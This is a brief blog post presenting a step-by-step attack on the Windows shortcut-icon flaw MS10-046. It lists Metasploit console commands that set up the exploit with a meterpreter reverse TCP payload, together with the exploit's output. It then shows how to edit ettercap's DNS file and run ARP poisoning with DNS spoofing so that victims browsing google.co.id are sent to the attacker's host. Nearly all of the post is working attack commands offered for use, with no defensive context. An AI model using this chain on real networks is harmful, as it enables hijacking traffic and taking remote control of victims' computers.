Pages

Friday, February 18, 2011

./metasploit ms10_046

vuln IE ms10_046_shortcut_icon_dllloader
on win XP sp 2
chek this video tutorial
command...
msf > use windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set SERVHOST 192.168.1.103

msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.103

msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.
[-] Handler failed to bind to 192.168.1.103:4444
[*] Started reverse handler on 0.0.0.0:4444
[*]
[*] Send vulnerable clients to \\192.168.1.103\antFQvQMNMd\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*]
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.103:80/
[*] Server started.

now edit etter.dns file
root@bt:/usr/share/ettercap# nano etter.dns

and change
google.co.id      A   192.168.0.103
*.google.co.id    A   192.168.0.103
www.google.co.id  PTR 192.168.0.103      # Wildcards in PTR are not allowed
now run dns spoofing
root@bt:~# ettercap -Tq -i eth0 -M arp // // -P dns_spoof
regards yur4kh4

No comments: